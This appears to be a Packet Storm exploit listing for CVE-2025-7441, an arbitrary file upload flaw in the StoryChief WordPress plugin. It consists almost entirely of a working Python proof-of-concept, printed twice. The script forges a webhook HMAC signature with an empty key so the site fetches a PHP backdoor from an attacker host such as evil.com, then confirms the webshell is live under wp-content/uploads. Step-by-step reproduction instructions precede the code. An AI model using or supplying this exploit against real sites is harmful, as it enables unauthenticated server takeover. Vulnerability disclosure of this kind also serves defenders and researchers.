9.8
/ 10
CRITICAL
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Description
WordPress..........................................
Basic Information
ID
PACKETSTORM:208852
Published
Aug 26, 2025 at 00:00
Affected Product
Affected Versions
# Exploit Title: StoryChief Wordpress Plugin 1.0.42 - Arbitrary File Upload
# Exploit Author: xpl0dec
# Vendor Homepage: https://www.storychief.io/wordpress-content-scheduler
# Software Link: https://github.com/Story-Chief/wordpress/
# Version: <= 1.0.42
# Tested on: Linux
# CVE : CVE-2025-7441
# CVSS Score : 9.8
# Step to reproduce :
# 1. Create a file with the .php extension and fill it with:
# <?php
# header(βContent-Type: image/jpegβ);
# echo β<?php phpinfo(); ?>β;
# ?>
# 2. Adjust the echo phpinfo section as needed
# 3. Host it on a VPS/web server with the name you want to upload, for example backdoor.php
# 4. The second argument is the URL of the backdoor created earlier, e.g., http://evil.com/backdoor.php
# 5. Then run the exploit: python3 CVE-2025-7441.py <wordpress_url> <backdoor_url>
from datetime import datetime
import requests
import json
import hmac
import hashlib
import sys
import time
import os
def banner():
print(r"""
_ _ ____ _____ _ _ _____ _ __ ____ _ __ __
| \ | |/ ___| ____| | | | ____| |/ / | _ \ / \\ \ / /
| \| | | _| _| | |_| | _| | ' / | | | |/ _ \\ V /
| |\ | |_| | |___| _ | |___| . \ | |_| / ___ \| |
|_| \_|\____|_____|_| |_|_____|_|\_\ |____/_/ \_\_|
PoC exploit CVE-2025-7441 by xpl0dec
""")
if __name__ == "__main__":
banner()
if len(sys.argv) != 3:
print(f"Usage: {sys.argv[0]} <target_url> <backdoor_url>")
sys.exit(1)
url = sys.argv[1] + "/wp-json/storychief/webhook"
dummy = {
"meta": {
"event": "publish"
},
"data": {
"featured_image": {
"data": {
"sizes": {
"full": sys.argv[2]
}
}
}
}
}
json_string = json.dumps(dummy, separators=(',', ':'), ensure_ascii=True)
json_string = json_string.replace("/", "\\/").encode()
signature = hmac.new(
"".encode(),
json_string,
digestmod=hashlib.sha256
).hexdigest()
headers = {
"Content-Type": "application/json"
}
payload = {
"meta": {
"mac" : signature,
"event": "publish"
},
"data": {
"featured_image": {
"data": {
"sizes": {
"full": sys.argv[2]
}
}
}
}
}
print("[+] get hmac... [+]")
time.sleep(2)
print("hmac : " + signature)
response = requests.post(url, headers=headers, data=json.dumps(payload))
if "permalink" in response.text:
print("[+] Response Success [+]")
time.sleep(2)
print("[+] Check backdoor from uploaded... [+]")
current_datetime = datetime.now()
month = str(current_datetime.month).zfill(2)
year = current_datetime.year
file_backdoor = os.path.basename(sys.argv[2])
get_backdoor = requests.get(sys.argv[1] + f"/wp-content/uploads/{year}/{month}/{file_backdoor}")
if get_backdoor.status_code == 200:
print("[+] Exploitation Success [+]")
time.sleep(2)
print("webshell uploaded in : " + sys.argv[1] + f"/wp-content/uploads/{year}/{month}/{file_backdoor}")
# Exploit Author: xpl0dec
# Vendor Homepage: https://www.storychief.io/wordpress-content-scheduler
# Software Link: https://github.com/Story-Chief/wordpress/
# Version: <= 1.0.42
# Tested on: Linux
# CVE : CVE-2025-7441
# CVSS Score : 9.8
# Step to reproduce :
# 1. Create a file with the .php extension and fill it with:
# <?php
# header(βContent-Type: image/jpegβ);
# echo β<?php phpinfo(); ?>β;
# ?>
# 2. Adjust the echo phpinfo section as needed
# 3. Host it on a VPS/web server with the name you want to upload, for example backdoor.php
# 4. The second argument is the URL of the backdoor created earlier, e.g., http://evil.com/backdoor.php
# 5. Then run the exploit: python3 CVE-2025-7441.py <wordpress_url> <backdoor_url>
from datetime import datetime
import requests
import json
import hmac
import hashlib
import sys
import time
import os
def banner():
print(r"""
_ _ ____ _____ _ _ _____ _ __ ____ _ __ __
| \ | |/ ___| ____| | | | ____| |/ / | _ \ / \\ \ / /
| \| | | _| _| | |_| | _| | ' / | | | |/ _ \\ V /
| |\ | |_| | |___| _ | |___| . \ | |_| / ___ \| |
|_| \_|\____|_____|_| |_|_____|_|\_\ |____/_/ \_\_|
PoC exploit CVE-2025-7441 by xpl0dec
""")
if __name__ == "__main__":
banner()
if len(sys.argv) != 3:
print(f"Usage: {sys.argv[0]} <target_url> <backdoor_url>")
sys.exit(1)
url = sys.argv[1] + "/wp-json/storychief/webhook"
dummy = {
"meta": {
"event": "publish"
},
"data": {
"featured_image": {
"data": {
"sizes": {
"full": sys.argv[2]
}
}
}
}
}
json_string = json.dumps(dummy, separators=(',', ':'), ensure_ascii=True)
json_string = json_string.replace("/", "\\/").encode()
signature = hmac.new(
"".encode(),
json_string,
digestmod=hashlib.sha256
).hexdigest()
headers = {
"Content-Type": "application/json"
}
payload = {
"meta": {
"mac" : signature,
"event": "publish"
},
"data": {
"featured_image": {
"data": {
"sizes": {
"full": sys.argv[2]
}
}
}
}
}
print("[+] get hmac... [+]")
time.sleep(2)
print("hmac : " + signature)
response = requests.post(url, headers=headers, data=json.dumps(payload))
if "permalink" in response.text:
print("[+] Response Success [+]")
time.sleep(2)
print("[+] Check backdoor from uploaded... [+]")
current_datetime = datetime.now()
month = str(current_datetime.month).zfill(2)
year = current_datetime.year
file_backdoor = os.path.basename(sys.argv[2])
get_backdoor = requests.get(sys.argv[1] + f"/wp-content/uploads/{year}/{month}/{file_backdoor}")
if get_backdoor.status_code == 200:
print("[+] Exploitation Success [+]")
time.sleep(2)
print("webshell uploaded in : " + sys.argv[1] + f"/wp-content/uploads/{year}/{month}/{file_backdoor}")